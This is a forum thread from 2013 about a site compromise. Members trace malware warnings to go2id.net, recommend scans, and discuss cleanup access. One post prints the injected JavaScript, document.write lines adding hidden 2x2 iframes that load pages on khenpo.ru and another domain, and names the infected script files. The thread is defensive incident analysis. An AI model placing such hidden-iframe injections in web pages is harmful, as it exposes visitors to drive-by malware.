Close Topic Options

Well yeah, but it's...nah, never mind. We're back so I'm gonna make an announcement post.

EDIT: Scratch that I can't.

Anyway, the gist of it is that while IDW was affected by some unscrupulous individuals sending traffic to other countries there's a chance that all members on Windows PCs have been affected by some payload or another. The actual problem itself was non-malicious--that is, it did not drop payload, it simply pumped traffic to certain websites. However, those websites themselves may have carried malware payload.

As such I am recommending that all members with Windows PCs who browsed the forum from February 9th until now run a malware scanner on their machine(s). A quick scan with Malwarebytes Anti-Malware should suffice to let you know if you have nasties on your machine or not. If you do, run a full scan afterward to make sure you nailed it. If you don't want to install something, Panda Antivirus has a good online scanner on their website.

There's also Sophos's offline scanner for really nasty bugs (like rootkits) but on top of the fact that I don't think any rootkits were involved with this incident that scanner has no user-selectable options and will cause problems afterward if used. It's kind of like using a nuclear bomb to kill a cockroach. Sure it'll work but the collateral damage will make you wonder if you did the right thing.

Those of you on Mac OSX, Linux or a mobile device would not have been affected.

This post has been edited by Nomake Wan on Feb 13 2013, 10:25 AM

Not sure if this is due to a recent database update where info was collected pre-codefix, or if it's new, but here you go:

Image size reduced, original size: 1360 x 728. Click here to view the image in its original dimension.

It says that it was collected 2/14, which would be today. However that's the main drop website and not the forums so I have no say in the matter. I haven't visited go2id in over half a decade.

It's entirely possible that something's on go2id though. IDW and WME appear to be clean but I'm not sure if go2id was actually checked.

The red banner stays on idforums.net, but goes away once you get deeper.

I haven't found any malicious content on the forums themselves so I'm not sure why it would. What happens if you go to the forums (with the red banner showing) then press CTRL+F5? Does the banner go away?

I can check when I get home from work. Comps are preloaded with IE and we can't install anything.

Banner stays.

However, if I go directly to the forum, not via the go2id gateway page, the banner does not appear.

Sounds to me like there's a bit of code on the main site that still loads extra links invisibly. If I'm not mistaken, whenever you loaded a page on the forums when they were infected, it would also invisibly load this photography website (or maybe it was the Russian one...) Maybe that's what's happening, except on the main site instead of the forums which are clean. That would explain why loading the forums directly instead of using the portal on the main site solves the problem.

The photography one was only in certain functions--it wasn't built into the forum bits. The Russian one was built into the forum bits.

I'll check out go2id with my packet sniffer and see what comes up. Thanks for the report, Spaz.

EDIT: go2id.net is very much being affected by the very same attack that had been leveraged on the forums' functions. As of now Go2ID is not a valid site but as far as I know there's no way to shut down access to it at this time since it is not actually connected to the forums in any way.

All I can say is, stop using Go2ID. The forums themselves are perfectly clean.

This post has been edited by Nomake Wan on Feb 15 2013, 05:00 PM

You're very welcome. Just passing along what I find.

Exactly as I predicted.

So uh guys. I don't know what this means but I think I should bring this to your attention. I've never gotten anything like this before so um... Yeah. What do you make of it?

Image size reduced, original size: 900 x 506. Click here to view the image in its original dimension.

How did you get that? Did you use go2id.net before entering the forums?

This post has been edited by Nomake Wan on Feb 19 2013, 12:00 AM

I tried checking this thread through this link: http://idforums.net/index.php?showtopic=45369 and that is where I got the warning. Its the AE86 plush doll~ thread.

As reported in IRC, the n00b posting in that thread stole his avatar from go2id directly. This is where the warning comes from. Also, the guy is an idiot who not only stole the image but didn't bother to resize it properly or host it on an actual image host.

Buckets full of fail. Buckets full of fail everywhere.

So... what to do? I'm at the ready to get stuff done.

Edit: nvm, it appears from board logs that Honda already removed the guy's avatar. That leak is plugged, at least.

This post has been edited by Tessou on Feb 19 2013, 08:24 AM

It's unfortunate that there's no way to set up a forum-level block of the go2id domain temporarily. I wouldn't even know how to begin doing that and with what little experience I have messing with IPB I don't think there's a forum-level way to do that. Pretty sure it would only be possible at the VPS.

If we had access to that, though, we could just fix go2id instead.

Yeah Boss, N1 told me in the IRC to go in and take out his avatar. It was a clean job. That was quite an adventure to say the least. I'll keep an eye out of things like this in the future too.

[ Post made via Mobile Device ]

You're all doing a great job of keeping the rest of us informed. A few of us, myself included, are not seeing these errors or malware alerts in any shape or form.

I'm not seeing any alert on idforums.net but go2id.net is still throwing errors in Google, Firefox and Chrome.

So after taking literally a 30 second look at go2id.net here is what I found.

SPOILER

CODE document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://khenpo.ru/ohcs.html?j=1381870></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emas.html?j=1381870></iframe>'); Has been injected into CODE http://go2id.net/files/ajax-dynamic-content.js http://go2id.net/files/ajax-tooltip.js http://go2id.net/files/ajax.js It also looks like something was also modified in the phpsysinfo folders (Don't ask me why you have two versions of phpsysinfo.) CODE http://go2id.net/temp/phpsysinfo/ http://go2id.net/files/phpsysinfo/

But as I've said, if you need help with the clean up, you know where to find me.

This post has been edited by HorizontalMitsubishi on Feb 19 2013, 03:55 PM

Has been injected into

CODE

http://go2id.net/files/ajax-dynamic-content.js http://go2id.net/files/ajax-tooltip.js http://go2id.net/files/ajax.js

It also looks like something was also modified in the phpsysinfo folders (Don't ask me why you have two versions of phpsysinfo.)

CODE

http://go2id.net/temp/phpsysinfo/ http://go2id.net/files/phpsysinfo/

It also looks like something was also modified in the phpsysinfo folders (Don't ask me why you have two versions of phpsysinfo.)

CODE

http://go2id.net/temp/phpsysinfo/ http://go2id.net/files/phpsysinfo/

idforums.net was only showing an alert for the thread Honda mentioned because a user in that thread was stealing his avatar from go2id.net, which has the alert.

The infection vector, content and disinfection method have been known this whole time--as you displayed those are the very same infections that had been on idforums.net in the past. As such ridding the domain of those problems is not a matter of expertise but rather one of access. Perry is the only person who can do it because he's the only one with access to those files to make changes. Perry isn't here. As soon as he's back he can fix the whole domain in one swoop in all of five seconds, just as he did with idforums.net.

This post has been edited by Nomake Wan on Feb 19 2013, 03:57 PM